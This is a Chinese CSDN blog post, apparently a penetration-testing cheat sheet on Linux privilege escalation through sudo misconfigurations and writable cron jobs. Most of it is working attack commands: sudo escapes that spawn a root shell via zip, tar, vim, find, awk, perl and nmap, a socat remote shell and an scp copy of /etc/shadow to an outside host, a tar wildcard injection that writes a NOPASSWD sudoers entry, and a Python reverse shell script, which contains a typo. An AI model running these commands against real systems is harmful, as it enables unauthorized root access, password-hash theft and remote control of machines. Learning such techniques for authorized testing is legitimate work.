WEB渗透Linux提权篇-Sudo提权

于 2024-09-05 14:45:26 发布
阅读量260 收藏 1
点赞数 6
分类专栏: 渗透测试 文章标签: linux 渗透测试 WEB渗透 WEB安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141930777
版权

 往期文章

WEB渗透Linux提权篇-提权工具合集-CSDN博客

WEB渗透Linux提权篇-环境变量提权-CSDN博客

WEB渗透Linux提权篇-可写文件提权-CSDN博客

WEB渗透Linux提权篇-查找辅助信息-CSDN博客

WEB渗透Linux提权篇-漏洞提权-CSDN博客

 

工具

https://github.com/TH3xACE/SUDO_KILLER
sudo_inject
https://github.com/nongiach/sudo_inject

>sudo -l  查看
/home/user/.sudo_as_admin_successful
>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
>sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
>sudo strace –o /dev/null /bin/bash
>sudo nmap –interactive nmap>!sh
>echo "os.execute('/bin.sh')">/tmp/1.nse
>sudo nmap –script=/tmp/shell.nse 
>sudo more/less/man /etc/rsyslog.conf  > !bash
>sudo git help status 
>!/bin/bash
>sudo ftp
>!/bin/bash
>sudo vim -c '!sh'
>sudo vi   > :!bash
>sudo find /bin/ -name ls -exec /bin/bash ;
>sudo find /home -exec /bin/bash \;
>sudo awk 'BEGIN {system("/bin/sh")}'
>sudo su
>sudo bash
>sudo perl -e 'exec "/bin/bash";'
>sudo python -c 'import pty;pty.spawn("/bin/bash")'
>sudo man man   > !bash
>sudo /bin/script/asroot.sh
>sudo env /bin/bash
>sudo ftp
>! /bin/bash
>whoami
>or
>! /bin/sh
>id
>whoami
>sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
>sudo scp /etc/shadow aarti@192.168.1.105:~/

计划任务

crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*

>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列举所有用户的crontab
$cat /etc/crontab
$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
$echo "" > "--checkpoint-action=exec=sh test.sh"
$echo "" > --checkpoint=1

或编辑可写的计划任务文件

#!/usr/bin/python
import os,subprocess,socket
s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.107","5555"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Pluto-2003
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB渗透Linux提权-提权工具合集
qq_59468567的博客
09-02 1749
用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用。检查文件权限、cron 作业(如果可见)、弱凭据等。搞个web服务提供下载。
WEB渗透Linux提权-漏洞提权
最新发布
qq_59468567的博客
09-04 236
检查执行命令所需时间 >time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 提前结束(多运行几次) >dbus-send --system --dest=org.freedes
WEB渗透Linux提权-可写文件提权
qq_59468567的博客
09-04 247
$ls –lh /etc/passwd 若是任何用户可读写 $perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")' $echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bas
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1434
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
渗透测试Linux提权精讲(三)之sudo方法第三期
Bossfrank的博客
08-01 1243
本文详解了渗透测试过程种获取初始立足点(通常是某个shell)后的利用sudo指令的提权方法(第三期),并对提权的原理和本质进行了介绍。总结了23种sudo提权方法,分别是:sudo jjs,journalctl,knife,less,man,more,mount,mysql,nano,neofetch,nice,nmap,node,nohup,openvpn,passwd,perl,php,pico,pkexec,python3,rvim,scp.
Linux提权备忘录
weixin_41489908的博客
10-21 1018
如果不是因为真的喜欢你,我纠缠你干嘛,我又何必那么卑微,那么不堪,甚至不停修改自己的底线,到最后变得一文不值。。。 ---- 网易云热评 一、判断是否为虚拟机 cat /proc/scsi/scsi dmesg |grep -i vir w / who 查询目前登录系统的用户 二、辅助工具 1. LinuxSmartEnumeration(参考了LinEnum.sh) 三个工作模式可选: -l 0 (缺省),显示特别重要的信息 -l 1 显示interesting的信息 -l ..
靶机渗透——linux提权
qq_74240553的博客
01-18 538
linux提权的基本背景知识
Linux提权Sudo 70种提权方法(上)
简单安全
04-04 1781
就是说flock能够解锁当前目录下的文件,允许它被操作其他的文件操作,这里是被bash操作,就会新起一个会话,因为这里是以sudo前缀执行,肯定就是root权限。利用cp命令,把TF变量里的内容里写入shadow文件,但要知道,这个操作是有损的,最后靶机shadow文件中只有这一行,如果不进行备份,在实际攻防中优先级是排后的。插件的使用方法是,这些python文件,去掉前面的前缀,后面就是插件名称,按照这个方式,在里面构建一个python文件,里面写入python提权语法。
linux系统提权——基于已经拿到www-data权限
热门推荐
m0re's blog
08-25 1万+
前言:上次学习利用目录遍历漏洞获取了一个反弹的webshell,但是权限是www-data,不是root权限,所以这次学习提权,拿到root权限。 本文目录提权介绍提权方式内核漏洞提权明文root密码提权计划任务总结: 提权介绍 往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 提权前提: 已经拿到低权shell 被入侵的机器上面有nc,python,perl等非常常见的工具 有权
linux提权总结8大类型,30多种方式
09-27
渗透测试安全领域中,Linux提权是一项重要的技能,它能够帮助安全研究人员在发现系统漏洞后进一步提升权限,以便更好地理解系统存在的安全隐患,并采取相应的安全措施。本文档根据给定的文件信息进行了详细的...
Linux提权的简单总结1
08-03
提权通常发生在权限受限的环境中,如Web服务渗透,其中www-data用户可能只能执行特定命令。为了扩大权限,需要查找可利用的漏洞和资源,如脆弱的脚本、软件、用户账户、内核漏洞等。常用的提权工具和命令包括: 1. ...
[网络安全自学] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
20210423web渗透学习之Linux下CRON JOBS 提权
qq_45290991的博客
04-24 623
本文其实介绍了一种很偏僻的提权方式,但是没有前面几mysql udf提权来的鸡肋,因为mysql实战几乎用不上,好吧这个其实也差不多(emmm……),最近出院了,今天多学点东西,五一有5天的假期,终于能够好好学习了,希望领导不要安排太多b事……参考链接:https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ https://xz.aliyun.com/t/2401 https://www.freebuf..
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
AsherGu的博客
08-29 1257
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
Linux字符设备驱动 -- regulator子系统
xi_xix_i的博客
09-01 889
Linux驱动之Regulator子系统Linux 内核之电源(加载流程)regulator,翻译就是调节器。一些可以输出电流电压的设备可以使用该子系统。举个例子,一个PMIC有多路输出,每一路输出都可以给很多外设、芯片供电。那么每一路输出,我都可以认为他是一个regulator。
linux 系统如何进行nfs(第五节)
weixin_44767571的博客
08-30 1032
首先是 在虚拟机中的操作。然后是在开发板上的操作。
Linux——进程管理
m0_67677309的博客
08-29 2424
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
Linux---文件(2)---文件描述符&&缓冲区(语言级)
m0_75102051的博客
09-03 724
本文介绍Linux中的文件描述符和语言级缓冲区
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值